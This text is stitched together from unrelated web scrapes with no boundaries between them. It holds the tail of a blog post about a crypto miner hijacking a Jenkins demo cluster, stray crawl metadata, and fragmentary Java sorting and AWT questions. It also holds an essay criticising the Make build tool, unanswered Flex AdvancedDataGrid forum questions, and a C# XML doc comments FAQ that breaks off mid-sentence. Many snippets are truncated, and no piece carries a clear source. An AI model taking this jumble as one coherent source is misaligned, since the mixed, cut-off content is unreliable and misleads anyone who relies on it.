the vulnerability immediately when starting a new one, instead of trying to secure an already compromised instance. This is also why we invested some time in scripting the provisioning of resources as I’ve highlighted in the beginning of this blog post. However, it is obvious that this might work better for demo applications that for production use cases. For the interested reader, there is also a more extensive list on essential security practices. Summarizing Despite the fact that we got hijacked by a crypto miner and let him mine some coins on our cluster for a weekend, this incident actually allowed us to learn how to build our demos right in terms of security. The experts in our Innovation Lab are always keen to build better software, which also means to leverage and integrate third-party software. Having a tool like Dynatrace got us covered to detect any malicious activities on our infrastructure makes our every day job a lot easier!
https://www.dynatrace.com/news/blog/how-dynatrace-helped-us-to-spot-one-of-the-biggest-trojan-crypto-miners-in-jenkins/
CC-MAIN-2022-21
refinedweb
1,530
60.75
algorithm algorithm Hi all, i have a task which is create an algorithm from a java code.and i need help from u guys to check on my algo put a comment... on this matter... thanks a lot. here is my algorithm: > Input Sorting Sorting can any help me know which sorting algorithm java uses for sorting collection and arrays algorithm algorithm convert this algorithm to java code IsSample_PAS: 1.for every attribute value aj belongs to ti do begin (here aj=1,2...,ti=1,2..) 2.if(CF... false; (this is algorithm from ieee paper QUALITY AWARE SAMPLING AND ITS Java sorting Java sorting can somebody help me know how java sorts? means which algorithm it uses internally n all? thank you in advance Please visit the following links: Java bubble sort Java Heap Sort Java Insertion Sort Sorting in Java Sorting in Java Sorting in Java Conflation Algorithm Conflation Algorithm implementation of conflation algorithm is possible using java?? conflation requires file handling a text contains stop words(is,or,and,.,)remove this words remove suffix(ing,ed..) remove equal words count Algorithm - Java Beginners Algorithm (a) Describe the manual procedure, if one has to use the above algorithm and the first element as the pivot to sort the sequence... the algorithm you want to use to sort the sequence. Thanks java array sorting manual way java array sorting manual way Hi, Anyone has any sample code on how to sort a array manually without using the inbuild sorting algorithm? Thanks Asymmetric algorithm - Java Beginners Asymmetric algorithm hybrid Digital image embedding using invisible watermarking with rsa and dct algorithm? please send me this project with source code........ regards subramanian Array sorting - Java Beginners Array sorting Hello All. I need to sort one array based on the arrangement of another array. I fetch two arrays from somewhere and they are related. For example, String type[] = {"X","T","3","R","9"}; String Problem analysis and algorithm design (i.e.: flowchart, algorithm) Problem analysis and algorithm design (i.e.: flowchart, algorithm) Problem analysis and algorithm design (i.e.: flowchart, algorithm)for this question.Write a Java program that prompt user to input a number of students awt Java AWT Applet example how to display data using JDBC in awt/applet Java Sorting Java Sorting Could somebody help me with this question. Implement a program to process votes for 5 candidates in a talent contest. The program should use a String array to hold the names of the 5 candidates and an integer Comparison between the types of sorting in java Comparison between the types of sorting in java welcome all i wanna program in java compare between selection,insertion,bubble,merge,quick sort In terms of timer and put all types in frame and find the timer for example array sorting an array of string with duplicate values - Java Beginners sorting an array of string Example to sort array string awt in java awt in java using awt in java gui programming how to false the maximization property of a frame Java AWT Java AWT What interface is extended by AWT event listeners Sorting in java - Java Beginners Sorting in java Hello.. I want you to help me with this question.. 1. A statistics company wants to keep information of families. The information of a family is the family name, the number of members and first name of each sorting array in java sorting array in java How to sort array in Java or JavaScript? JavaScript Sorting array tutorial Java Sort array of strings import java.util.*; class ArrayExample{ public static void main(String java sorting codes - Java Beginners java sorting codes I want javasorting codes. please be kind enogh... the following link: Here you will get various sorting algorithms. Hope that it will be helpful for you Java AWT Java AWT What is meant by controls and what are different types of controls in AWT Java AWT Package Example Java AWT Package Example In this section you will learn about the AWT package of the Java. Many running examples are provided that will help you master AWT package. Example Java Sorting and Searching Java Sorting and Searching If anyone could help me with this I would be really thankful! Write a program that stores the names of these artists in a String array. The program should prompt the user to enter the name Sorting algorithms - Java Beginners Sorting algorithms I'v being given an assignment and I still couldn't find a proper answer for the following questions.Can anyone pls pls help me wi it? 1)Compare and contrast efficiencies of Shell,Quick,Heap and Radix sort - Java Interview Questions ("Items after sorting are ="+list); } } merge sorting in arrays - Java Beginners merge sorting in arrays Write a program to insert string or characters to an array and apply merge sorting on this array Hi Friend, Please visit the following link: sorting - Java Beginners ; Easy Sorting: For all the values in the array A, find the largest and store Java Dialogs - Swing AWT /springlayout.html... visit the following links: Dialogs a) I wish to design a frame whose layout mimics Bubble Sorting in Java Bubble Sorting in Java Introduction In this example we... sort is also known as exchange sort. Bubble sort is a simplest sorting java - Swing AWT information, Thanks...java i want a program that accepts string from user in textfield1 and prints same string in textfield2 in awt hi, import java.awt. Sorting and Searching Sorting and Searching Hi i would really be thankful if someone could help me with this A program is required to ask users to rate the Java...) { Scanner input = new Scanner(System.in); System.out.print("Rate Java(0-10 Java - Swing AWT Java Hi friend,read for more information, Selection Sort in Java . In selection sorting algorithm, the minimum value in an array is swapped... sort is probably the most spontaneous sorting algorithm. Selection sort... in Java. In selection sort algorithm, first assign minimum index in key as index awt - Swing AWT , For solving the problem visit to : Thanks... market chart this code made using "AWT" . in this chart one textbox when user Sorting an ArrayList Sorting an ArrayList print("code sample");Hello All, I am working on a program for school and I am having trouble with sorting my list... really new at Java...This is only the second program I am writing for school implementing an algorithm using multi threads - Java Beginners implementing an algorithm using multi threads Hi i need to implement an algorith in multi threads.Algorithm has data dependency so i need to pass data from one thread to another thread. I am posting my algorithm which needs java - Swing AWT java how to use JTray in java give the answer with demonstration or example please java - Swing AWT What is Java Swing AWT What is Java Swing AWT Java AWT Package Example java - Swing AWT Java Implementing Swing with Servlet How can i implement the swing with servlet in Java? Can anyone give an Example?? Implementing Swing with Servlet Example and source Code Servlet SwingToServlet Java: Example - String sort Java: Example - String sort Sorting is a mechanism in which we sort the data in some order. There are so many sorting algorithm are present to sort the string. The example given below is based on Selection Sort. The Selection sort Java AWT Java AWT What is the relationship between the Canvas class and the Graphics class NAME SORTING. . .anyone? - Java Beginners NAME SORTING. . .anyone? how can I sort names without using the 'name.sort' method? please help. . .anyone? the program should sort the first three(3) letters of the names tnx java masters out there!! (^_^) cVm Hi Java - Swing AWT ....("Paint example frame") ; getContentPane().add(new JPaintPanel sorting student record - Java Beginners sorting student record Program in java for inserting, recording, deleting, editing and searching student details can u explain about recording ? u want to store value in database or in file or opertinng run time Create a Container in Java awt Create a Container in Java awt Introduction This program illustrates you how to create...; } } Download this example ARRAYS SORTING - Java Interview Questions ARRAYS SORTING How To Sort An Array With Out Using Sort Method ?I Want Code? Hi, Here is the code in java. You can find both Ascending and Descending order code. Ascending order is commented. public class java awt components - Java Beginners java awt components how to make the the button being active at a time..? ie two or more buttons gets activated by click at a time How to write a rsa algorithm using thread How to write a rsa algorithm using thread Hi... This my **rsa algorithm sequential code..can u anyone plz change/convert to concurrent java or parallel this code.. print("code sample"); import AWT code for popUpmenu - Swing AWT for more information. code for popUpmenu Respected Sir/Madam, I am writing a program in JAVA/AWT.My requirement is, a Form consists of a "TextBox" and a "Button Quick Sort in Java Quick sort in Java is used to sort integer values of an array. It is a comparison sort. Quick sort is one of the fastest and simplest sorting algorithm... into a sorted array. Example of Quick Sort in Java: public class QuickSort String arrays in java - Java Beginners Sorting String arrays in java I have to make an interface that creates an array of unknown size, resizes the array when needed, and sorts the array... not think that my sorting thusfar is correct. Can anyone help? Please help sorting an array of string with duplicate values - Java Beginners sorting an array of string with duplicate values I have a sort method which sorts an array of strings. But if there are duplicates in the array it would not sort properly Beginners java-awt how to include picture stored on my machine to a java frame? when i tried to include the path of the file it is showing error. i have... information, Thanks awt jdbc awt jdbc programm in java to accept the details of doctor (dno,dname,salary)user & insert it into the database(use prerparedstatement class&awt Alphabetically sorting order Alphabetically sorting order Write a java program that takes a list of words from the command line and prints out the arguments in an alphabetically sorted order Hi Friend, Try the following code: import to send message from one computer to another Java Program - Swing AWT Java Program A Java Program that display image on ImageIcon after selecting an image from the JFileChooser Java Program - Swing AWT Java Program A java Program that send message from one computer to another and what are the requirements Insertion Sort Java Insertion Sort in Java is an algorithm that is used to sort integer values.... In insertion sorting, algorithm divides the elements in two parts, one which... sort a list simultaneously as it receives it Example of Insertion Sort in Java Create a Frame in Java in java AWT package. The frame in java works like the main window where your components (controls) are added to develop a application. In the Java AWT, top-level... Create a Frame in Java   java - Swing AWT java Write Snake Game using Swings sorting returnFirstNonRepeatedChar(char[] str) { //write an algorithm to find the first non - Swing AWT How to start learning Java I am a Java Beginner ...so, please guide me how to start Java Code - Swing AWT Java Code How to Make an application by using Swings JMenuBar and other components for drawing various categories of Charts(Line,Bar etc Ask Questions? If you are facing any programming issue, such as compilation errors or not able to find the code you are looking for. Ask your questions, our development team will try to give answers to your questions.
http://www.roseindia.net/tutorialhelp/comment/84441
CC-MAIN-2013-20
refinedweb
1,981
51.68
KWin #include <effectloader.h> Detailed Description Can load the Built-In-Effects. Definition at line 268 of file effectloader.h. Constructor & Destructor Documentation Definition at line 75 of file effectloader.cpp. Definition at line 81 of file effectloader.cpp. Member Function Documentation Whether this Effect Loader can load the Effect with the given name. The Effect Loader determines whether it knows or can find an Effect called name, and thus whether it can attempt to load the Effect. - Parameters - - Returns - bool trueif the Effect Loader knows this effect, false otherwise Implements KWin::AbstractEffectLoader. Definition at line 85 of file effectloader.cpp. Whether the Effect with the given name is supported by the compositing backend. - Parameters - - Returns - bool trueif it is supported, falseotherwise Implements KWin::AbstractEffectLoader. Definition at line 90 of file effectloader.cpp. All the Effects this loader knows of. The implementation should re-query its store whenever this method is invoked. It's possible that the store of effects changed (e.g. a new one got installed) - Returns - QStringList The internal names of the known Effects Implements KWin::AbstractEffectLoader. Definition at line 95 of file effectloader.cpp. Synchronous loading of the Effect with the given name. Loads the Effect without checking any configuration value or any enabled by default function provided by the Effect. The loader is expected to apply the following checks: If the Effect is already loaded, the Effect should not get loaded again. Thus the loader is expected to track which Effects it has loaded, and which of those have been destroyed. The loader should check whether the Effect is supported. If the Effect indicates it is not supported, it should not get loaded. If the Effect loaded successfully the signal effectLoaded(KWin::Effect*,const QString&) must be emitted. Otherwise the user of the loader is not able to get the loaded Effect. It's not returning the Effect as queryAndLoadAll() is working async and thus the users of the loader are expected to be prepared for async loading. - Parameters - - Returns - bool trueif the effect could be loaded, falsein error case Implements KWin::AbstractEffectLoader. Definition at line 105 of file effectloader.cpp. Definition at line 128 of file effectloader.cpp. The Effect Loader should query its store for all available effects and try to load them. The Effect Loader is supposed to perform this operation in a highly async way. If there is IO which needs to be performed this should be done in a background thread and a queue should be used to load the effects. The loader should make sure to not load more than one Effect in one event cycle. Loading the Effect has to be performed in the Compositor thread and thus blocks the Compositor. Therefore after loading one Effect all events should get processed first, so that the Compositor can perform a painting pass if needed. To simplify this operation one can use the EffectLoadQueue. This requires to add another loadEffect method with the custom loader specific type to refer to an Effect and LoadEffectFlags. The LoadEffectFlags have to be determined by querying the configuration with readConfig(). If the Load flag is set the loading can proceed and all the checks from loadEffect(const QString &) have to be applied. In addition if the CheckDefaultFunction flag is set and the Effect provides such a method, it should be queried to determine whether the Effect is enabled by default. If such a method returns false the Effect should not get loaded. If the Effect does not provide a way to query whether it's enabled by default at runtime the flag can get ignored. If the Effect loaded successfully the signal effectLoaded(KWin::Effect*,const QString&) must be emitted. Implements KWin::AbstractEffectLoader. Definition at line 110 of file effectloader.
https://api.kde.org/4.x-api/kde-workspace-apidocs/kwin/html/classKWin_1_1BuiltInEffectLoader.html
CC-MAIN-2019-39
refinedweb
626
57.67
A Python SDK for interfacing with KnuVerse Cloud APIs Project Description # knuverse-sdk-python This project is an Python SDK for interfacing with Knuverse Cloud API’s. It allows Python developers to create apps that use Knuverse Cloud API’s. You can find the documentation at Quick Start First, install the knuverse-sdk: $ pip install knuverse Then, in a Python file: from knuverse.knufactor import Knufactor api = Knufactor( "", username="<username>", password="<password>", account="<account_id>" ) for client in api.get_clients(): print "%s: %s" % (client.get("name"), client.get("state")), Download Files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://test.pypi.org/project/knuverse/
CC-MAIN-2018-09
refinedweb
109
57.87
Several Make clones are open-source C software and all build platforms have a Make preinstalled. Make-based builds are known to be portable and they really are compared to some IDE solutions. The problem is that the Make tool, as it was originally implemented, has to rely on shell commands and on features of the file system. These two, the shell and the file system, are notorious sources of platform incompatibilities. By consequence the fact that every system has a Make is probably true but not relevant. The statement “Every system has a shell” is also true. That doesn't mean that shell scripts are portable and nobody claims that. Another problem is the fact that the original Make was lacking some fundamental features and later clones added the missing features in different ways. The obvious example is the if-then-else construct. It is not really possible to build real-life projects without if-then-else. One has to use workarounds. and that builds up even more resistance to change. The speed issues in large builds are well documented in Peter Miller's seminal article: “Recursive Make Considered Harmful” (). When using recursive Make, there is no simple way to guarantee that every component is visited only once during the build. Indeed, the dependency tree is split in memory between several processes that don't know recursive Make is not the only way to implement Make. You may wonder, if it is harmful, why is it so widely used? One argument that people mention is that recursive Make is easier to set up. This is not a very solid argument. For example, John Graham Cumming demonstrates in a recent DDJ article () a simple non-recursive Make system. There is also a more subtle argument in favor of recursive Make. The fact is that it allows developers to use their knowledge about the project to easily start only a smaller part of the build. In non-recursive systems, you can start a smaller part but the system will usually "collect" first all the build descriptions which is slower or has undesired side-effects or both. It is also possible to design and implement systems that are somewhere in between. Some homegrown Make-based systems use clever checks outside Make to avoid starting new Make processes when there is nothing to be built that the build is difficult to reproduce for another user on another build machine. A more subtle issue is that it is difficult to document the build. Most modern systems allow you to ask which are the parameters of the build and which are their meaningful values? Make doesn't help you to provide this feature despite the fact that Make-based builds definitely need it. Even without several sources for variables, Make and many of its clones are implemented using the C/C++ programming languages. They are speed-efficient implementations. Indeed, correctly designed Make based builds show little overhead while building. But, before you enjoy too much the raw speed of Make, you have to remember that fast is not safe and safe is not fast. Because of this fundamental contradiction, you should look suspicious containing the sources for the build. When those clocks get out of sync (yes, that happens) you may get inaccurate builds, especially when running parallel builds. Moreover, Make takes the approach of not storing any stamp between builds. This is a very bad choice because it forces Make to use risky heuristics for change detection. This is how Make fails to detect that the file changed to another one older than the entire project when that central header file was regenerated with the same content as before. An even more insidious safety issue is the fact that Make does not detect changes in the environment variables that are used or in the binary executables of the tool chain that is used. This is usually compensated with proprietary logic in homegrown Make systems, which makes the build more complex and more fragile. Implicit dependencies One cannot criticize the Make mechanism for implicit dependencies detection for a good reason: Make doesn't have such mechanism. In order to deal with the header file inclusion in C sources several separate tools exist as well as special options to some compilers. High-level tools wrapping Make use them in order to provide a more or less portable "automatic dependencies" feature. Despite the efforts and the good will of those higher-level tools, Make The Make build tool was and still is a nice tool if not stretched beyond its limits. It fits best in projects of several dozen source files working in homogeneous environments (always the same tool chain, always the same target platform, etc.). But it cannot really keep up with today requirements of large projects. After I tell people what is wrong with the Make tool, the next question is always the same: "if it is so awkward, then how comes that it is so widely used?". The answer does not pertain to technology; it pertains to economy. In short, the reason is that workarounds are cheaper than complete solutions. In order to displace something, the new thing has to be all that the old thing was and then some more (some more crucial features not just some more sugar). And then it has to be cheaper to top it. Despite the difficulty of being so much more, in my humble opinion, today the time of retreat has come for the Make tool.. This one introduces quite some syntax extensions compared to the original tool. You can tell by those extensions that the authors were C++ programmers (for example, the scoping of variables looks like C++ namespaces). Boost.Jam is not the only: the bootstrapping. The question is how do you build when you don't have Windows us occurs so often in build descriptions, see Make macros). Or you may want one element to be taken from the parent or the parent if not found at some place , download automatically other needed parts and install everything on your system while building locally parts that need building. Those systems include a build tool or act as a build tool when needed. They have to act as a configuration tool too. Also,.
https://bitbucket.org/scons/scons/wiki/FromMakeToScons?action=fullsearch&value=linkto%3A%22FromMakeToScons%22&context=180
CC-MAIN-2019-04
refinedweb
1,047
61.67
mq_timedsend mq_timedsend() Send a message to a message queue Synopsis: #include <mqueue.h> #include <time.h> int mq_timedsend( mqd_t mqdes, const char * msg_ptr, size_t msg_len, unsigned int msg_prio, const struct timespec * abs_timeout ); Arguments: - mqdes - The descriptor of the message queue you want to put the message into, returned by mq_open(). - msg_ptr - A pointer to the message data. - msg_len - The size of the buffer, in bytes. - msg_prio - The priority of the message, in the range from 0 to (MQ_PRIO_MAX-1). - abs_timeout - A pointer to a timespec structure that specifies the absolute time (not the relative time to the current time) to wait before the function stops trying to receive messages.: The mq_timedsend() function puts a message of size msg_len and pointed to by msg_ptr into the queue indicated by mqdes. The new message has a priority of msg_prio. The queue maintained is in priority order, and in FIFO order within the same priority. If the number of elements on the specified queue is equal to its mq_maxmsg, and O_NONBLOCK (in oflag of mq_open()) hasn't been set,. In the traditional (mqueue) implementation, calling write() with mqdes is analogous to calling mq_timedsend() isn't opened for writing. - EINTR - The call was interrupted by a signal. - EINVAL - One of the following is true: - The msg_len is negative. - The msg_prio is greater than (MQ_PRIO_MAX-1). - The msg_prio is less than 0. - The MQ_PRIO_RESTRICT flag is set in the mq_attr member of mqdes, and msg_prio is greater than the priority of the calling process. - EMSGSIZE - The msg_len argument is greater than the msgsize associated with the specified queue. - ETIMEDOUT - The timeout value was exceeded. Examples: See the example for mq_timedreceive(). Classification: See also: mq_close(), mq_open(), mq_receive(), mq_send(), mq_timedreceive(), timespec mq, mqueue in the Utilities Reference
http://www.qnx.com/developers/docs/6.3.2/neutrino/lib_ref/m/mq_timedsend.html
CC-MAIN-2013-20
refinedweb
290
57.77
Flex :: Drag&Drop In Advanced DataGrid?Jan 18, 2010 I have a Advanced DataGrid for displaying the number of rows from the Database and one row strictly should not allowed drag option. Is is possible I have a Advanced DataGrid for displaying the number of rows from the Database and one row strictly should not allowed drag option. Is is possible How to use the advanced datagrid in Flex? I am trying to get the values from a database and construct the hierarchial data. In particular, constructing the dynamic hierarchal data for advanced datagrid. I have a scenario like, Advanced DataGrid have a checkBox and if i select the header checkBox all the field checkBoxes has to be selected that means multi-select checkBox.View 1 Replies View Related I have a Advanced Datagrid with sorting. I think it is string sorting by default. But i need the sorting in number. How can i achieve the number sorting.for example: i have row numbers like 1 to 100 . i need number sorting like 1,10,100.View 2 Replies View Related I have a Advanced DataGrid requirement. But i do not have idea how to create it.View 2 Replies View Related I need to develop Advanced Datagrid like the below attached image. So I had developed the Grid with some columns but do not know how to rendering the image in the result part of the grid. how to rendering the images in the result part.View 1 Replies View Related I have a advanced datagrid and displying the 10 records. but when loading the data, the first record should be selected.View 1 Replies View Related I have an AdvancedDataGrid that loads data from a web service. It only loads the top level stuff and then as you click the arrows it gets that data. All I want to do is to find out if some text is in one of the cells. I originally did this: public static function assertTextInAdg(params:Object):Boolean{ // Gets the ADG trace('youre in the assertTextInAdg function'); var grid:* = FPLocator.lookupDisplayObject(params); trace('var grid:* = FPLocator.lookupDisplayObject(params): ' + grid); [Code] ..... And then it fails, because it can't get the source, I think. I am completely open to other strategies and I have been stuck on this problem for 10 days now. This seems like it would be relatively easy. I have been going down a slightly different route. I am now trying to iterate through the HierarchicalCollectionView with a cursor. This seems to work. But, when I get the node I can't do anything useful with it... I have been looking for examples but so far they all stop at the point of getting the node. public static function assertTextInAdg(params:Object):Boolean{ // Gets the ADG trace('youre in the assertTextInAdg function'); var grid:* = FPLocator.lookupDisplayObject(params); trace('var grid:* = FPLocator.lookupDisplayObject(params): ' + grid); [Code] ..... I had 7 columns in an advanced datagrid and have one comboBox with all of the columns names.The datagrid should show only the columns the use has selected in the comboBox. Does this mean customization of the advanced datagrid columns? If anyone has any samples, please share them.View 1 Replies View Related I am trying to set the row background color for the advanced data grid control in Flex 3. Does anyone know if this is possible using a style function. Currently my style function looks like: public function myStyleFunc(data:Object, col:AdvancedDataGridColumn):Object { if (data["status"] == "PRICING") return {color:0xFF0000 , fontWeight:"bold" , backgroundColor:0xFF0000}; [Code]..... However the background color does not change. I have heard on the grape vine that I may need to override some methods to enable the background color property. How to enable CheckBox inside an Flex Advanced Datagrid.View 1 Replies View Related I have an ADG along with some other components in a VBox. The number of rows of items in the ADG is variable. I want the height of the ADG to be however tall it needs to be to show all the rows without scrolling. This is because I want the containing VBox to handle all the scrolling. The reason being, is because sometimes there is a horizontal scroll bar on the VBox, in this case you have to scroll all the way to the right to reveal the scroll bar for the ADG before you can scroll the ADG.View 1 Replies View Related I want to capture the header click event and on click , i want to split the columns ,by adding the AdvancedDatgridColumnGroup dynamicaly at each level. capturing the header click event. I want to explore the advanced datagrid option more. <mx:AdvancedDataGrid [Code]..... I have a advanced data grid with columns as status, enabled, owner, name. I will get data for status as 'applicable' or 'success' or 'failure' . When the status is coming as 'applicable', i have to show the tool tip when move the mouse over there.View 1 Replies View Related How to get the values of a selected row in the Advanced DataGrid control in FlexView 1 Replies View Related i've got an ArrayCollection which is properly displayed in this Advanced Datagrid: [Code]... I have my ADG displaying data like this: [Code]... Getting error while run the checkBox item renderer in advanced datagrid with out data. Error: Cannot access a property or method of a null object reference. Code: public function set listData(value:BaseListData):void { _listData=value; _dataGrid=value.owner as AdvancedDataGrid; _dataField=(value as AdvancedDataGridListData).dataField; } Here value is coming null, so I am getting above exception. I have an advanced datagrid that has a grouping on it. With the items inside of the grouping I have it setup where you double click on an item and it will create a popup that allows the user to edit that entry. The problem that I am having is that I can double click on the group title and the popup is activated with blank information.[code]...View 1 Replies View Related I want to listen both click and double click events for advanced data grid in flex. I have given double click enabled true and written the function in itemdoubleclick but only click is working but not itemdoubleclickView 1 Replies View Related I'm working on a simple view in my app that allows a user to drag an item from a list control and drop it onto a textarea. Seems the dragEnter event fires just fine, but the dragDrop event does not. I am trying to create basically a puzzle in Flex Builder 3. I display images from an array onto a canvas that can be dragged and dropped around the canvas. My problem is that I don't want the images to be able to overlap each other. how to prevent this?? They can overlap as you drag but not when dropped, they need to "snap" to the nearest point that is not already occupied by another image.View 1 Replies View Related I have a simple drag and drop, and wanted to change the state of the drop target on a match. It works as expected, but then there the state changes back to normal (or the itemrenderer is refreshing). I am guessing there is either an override that i need to do, or in need to flag it to not refresh, but having no luck. MXML <?xml version="1.0" encoding="utf-8"?> <s:Application xmlns:fx="" xmlns:s="library://ns.adobe.com/flex/spark" [Code]..... I'm running into an issue where the rendererProvider does not pass data that is in the xmlListCollection, but does transfer it as an Array(). Is this correct, or should an xmlistcollection work?View 2 Replies View Related I am designing a web application in Flex 4 and currently facing an issue rendering advanced HTML tags and entities in Flex 4. All I want to do is basically render an HTML text coming to me something like the one given below:- [Code].... I am building an AIR application which opens some specific documents. I want to enable dragdrop on this application. So that when application is running and user drag a file and drop that file on the application window, the application must respond to that event and must be able to perform some action.View 2 Replies View Related I am working on a grid example in flex using advanced grid control. I know we can easily group data by specifying the field name. At the group node level, other than the gorup name I want to be able to show data in the rest of the cells ( calculated data ) and I am looking for some dataRowBound event or similar to be able to hook some data in it. Example: Grid displaying list of towns grouped by state. At the group level ( for each state) I want to show the total number of towns in each state. Here how can i show the total number in the town column. I want to create a custom component library. the components are customize-able during creation time. means like Accordion or TabNavigator, when we drag and drop the Accordion in flash builder it <mx:Accordion <s:NavigatorContent </s:NavigatorContent> [code].... I've added an eventListener to the COLLECTION_CHANGE event that is fired when the grid is finished resorting the items in its dataProvider, after the user clicks on a column header:MyType (myDataGrid.dataProvider).addEventListener(CollectionEvent.COLLECTION_CHANGE,onDataGridResort);View 1 Replies View Related I am working on a problem since a week soon, but I still couldn't make it work as expected. I have a DataGrid which has HBox with a CheckBox an a Label as itemRenderer (see Code below). When I tap in to the Cell the standard itemEditor pops up and lets you enter the content of the label. Thats the standard behavior. I works fine except for 2 problems: If I enter to much text, the horizontal srollbar pops up, and the cell is filled with that scrollbar. As you see I tried to set the horizontalScrollPolicy to off, but that doesnt work at all... I tried to do that for all the different elements, but the failure is still existent. When I have filled more than one row, there is an other mistake happening. If I tap on a row, the datagrid selects the one below that row. That's only if one line is already selected. If I tap outside the datagrid and then, tap at any row the itemEditor of the right row will show up... Is there anything now wright in the setup of my set data method? package components { import mx.containers.HBox; import mx.controls.CheckBox; [Code]...... From this (normal dataGrid) into this (horisontal data grid) How to turn Flex MXML DataGrid into something like Horisontal DataGrid? (may be some how with Flash builder 4?) Keeping all stuff DataGrid has like eating data from data provider sortind dragging - droping items etc I have two datagrids: - Division Both have single columns. Selecting one item from Divsions datagrid should display members of that Division in the Members datagrid. But following code has some problem and Members of a particular division do not show up when respective Divsion is clicked. Following are some snippets of the related code. Hope someone can spot an error in it. [Code].. For poor performance reasons, the DataGrid will cache checkboxes and reuse them for different rows. If you have 50 rows, it won't create 50 checkboxes. It will create as many checkboxes at are visible, plus a few more for padding, and then reuse them as you scroll. This is why you need to explicitly manage their state. How can improve it ? How can fixed checkbox value ? i used checkbox like below But checkbox doesnot remembering the values [Code]... I'd like to know how to create an "overlay" in Flex's Advanced Grid? See the sample here [URL].View 1 Replies View Related when we use an advanced data grid, only when we click on the parent element the children details get populated in the corresponding columns, right?..SO now i have made the empty columns invisible(at design) now how do i make them visible at run time when the parent element is expanded..similarly once the columns are visible, how can i make them invisible again when the parent element is closed.View 1 Replies View Related
http://flash.bigresource.com/flex-DragDrop-in-Advanced-DataGrid--830WdeiRb.html
CC-MAIN-2015-18
refinedweb
2,078
64.61
You have a number of excel files (xls). In each excel file there various sheets. Each sheet has a header and a number of lines following it. You want an output of the format (csv): filename1, sheet name 1, row count , sheet name 2, row count, sheet name 3, row count filename2, sheet name 1, row count , sheet name 2, row count, sheet name 3, row count Well here is a script that does just that! You will need python and dexutils both downloadable from : google code make a folder (i will call it SCRIPT) and make a file getsheetrowcounts.py containing the following data : import dex from dex import xlrd decrementoneforheader = True files = dex.glob('./input/*.xls') book = {} # book['filename']=[] for file in files: wb = xlrd.open_workbook(file) file = dex.GetFilenameWithoutExt(file) sheets = wb.sheet_names() for sheetname in sheets: sh = wb.sheet_by_name(sheetname) rowcount = sh.nrows try: book[file] except: book[file]=[] book[file].append(sheetname) if (decrementoneforheader): rowcount = rowcount-1 book[file].append(str(rowcount)) # now we have the data outlines = [] for bookname in book.keys(): line = bookname rows = book[bookname] for column in rows: line = line + "," + column outlines.append(line) dex.writelines('output.csv',outlines) Next make a folder "input" inside of SCRIPT and place all the excel files in this folder. Finally run getsheetrowcounts.py and you will get the desired output.csv
http://basaratali.blogspot.com/2009_07_01_archive.html
CC-MAIN-2017-17
refinedweb
227
68.97
Autotest 0.15.0 is a new major release of autotest! The goal here is to provide the latest advances on autotest while providing a stable ground for groups and organizations looking for autotest, such as distro packagers and newcomers. For the impatient Direct download link: Now that github removed arbitrary uploads, we now will release directly fom git tags. The tags now will be signed with my GPG key. So get your fresh copy of autotest (remember, the tarball does not contain the tests anymore, those must be picked at the new test repos). Changes Tests modules split Since test modules are fairly independent from the core framework, they have been split into their own new git repos, and were added to autotest as git submodules. Don’t worry, if you want the autotest repo with full tests, you may only need to execute git clone –recursive git://github.com/autotest/autotest.git The new repositories for the client and server tests: API cleanup Following the example of autotest 0.14.0, 0.15.0 brings more API cleanups. 1) global_config -> settings The library global_config was renamed to settings. As an example of how the change works, here’s an example of how to access settings on autotest 0.14.X: from autotest.client.shared import global_config c = global_config.global_config.get_config_value c.get_value("mysection", "mykey") This is how the same process look on autotest 0.15.0: from autotest.client.shared.settings import settings settings.get_value("mysection", "mykey") As tests usually have no business with the autotest settings, this means pretty much no update required from test authors. Machine installs from the autotest web interface In autotest 0.14, we introduced preliminary integration between autotest and the Cobbler install server () was introduced. However, there was not enough of that integration visible if you were using the web interface. Now it is possible to select which cobbler profiles you want to use on your test machines from the web interface. DB migration moved to Django South When the autotest RPC server application was developed, there was a database code in place already. In order to move away from having 2 ways to access the database, this version of autotest introduces a new migration system, based on Django South (). For people looking for upgrading the database to the latest version, we’ve put up a procedure here Other changes * Support for creation of debian packages * Simplified module import logic * Simplified unittests execution * Improved install scripts. Now it is possible to install autotest from an arbitrary git repo and branch, which will make it easier to test and validate changes that involve the rpc client/server, scheduler, among others. What’s next? We believe the foundation for an autotest version 1.0 is already in place. So, the next release will be autotest 1.0, bringing polish and bugfixing to the framework being developed during the previous six years. You can see the issues open for the Milestone 1.0.0 here: and here: For autotest 1.0 we plan on upgrading the stack to the latest versions of the foundation technologies involved in the server operation, and package generation: * Update the web interface (RPC client) to the latest GWT * Update the RPC server to the latest Django * Functional server packages for Debian * Automated generation of both rpm and debian packages * Functional regression test suite for server installs, working out of the box We also want to improve the usefulness and usability of our existing tools * Introduce a ‘machine reserve’ mode, where you may provision one bare metal machine with the OS of choice and use the installed machine for a period of time, in a convenient way. * Allow to schedule jobs based on machine hardware capabilities, for example: – Number of CPUS – Available Memory – Virtualization support among others * Allow autotest to function well as an alternative test harness for beaker (). * Support to parametrized jobs (be able to set parameters in tests, and enable people to simply pass parameters to those tests in the cli/web interface).
https://mybravenewworld.wordpress.com/2013/03/21/autotest-0-15-0-released/
CC-MAIN-2020-40
refinedweb
674
52.49
Ever since we released the first version of C# 1.0 I’ve received a question or two a month about XML documentation comments. These are often referred to as ‘doc comments’ for short. The questions range from the use of doc comments in VS to the recommended schema of the XML. This post captures a few of the common questions that I’ve seen. Why isn’t there a multi-line version of XML doc comments? There are actually two forms of doc comments in C#, single and multi-line. However, the single-line version is by far the most commonly used; in fact, the multi-line version wasn’t supported until the 1.1 version of the compiler even though they were defined in the 1.0 version of the language spec. The single line version is likely to be familiar to any user of Visual Studio; it’s syntactically indicated on a line that starts with a triple slash (///): /// <summary> /// This is the single line version of the doc comment /// </summary> static void Example() { } The multi-line version uses /**: /** <summary> * This is the multi-line version * </summary> */ static void Example() { } They are functionally identical, the only difference being that it’s possible to use the multi-line version “inline” within an expression. The multi-line version of the comments weren’t actually in the proposed version of the language specification submitted to ECMA; however, the ECMA committee decided that having both forms would be better. The C# language service doesn’t support multi-line XML doc comments as well as the singe line comments (i.e. /** doesn’t auto-generate any tags); however, colorization for multi-line doc comments does work, and in VS 2005 it’s possible to get completion lists for the tags but you must first end the multi-line comment and then go back and enter in the tags. How do I make VS show the XML doc comments of the types and methods of my components in completion lists and object browser? This has been an extremely common question for a long time. The short and long of it is that you must deploy the XML file that is generated by the compiler with the component. They must be in the same directory, and the XML file must have the same name as the component except with an .xml extension. I wrote a whitepaper that contains a walkthrough, in VS 2003, which demonstrates this. It’s available here. How do use XML doc comments to refer to 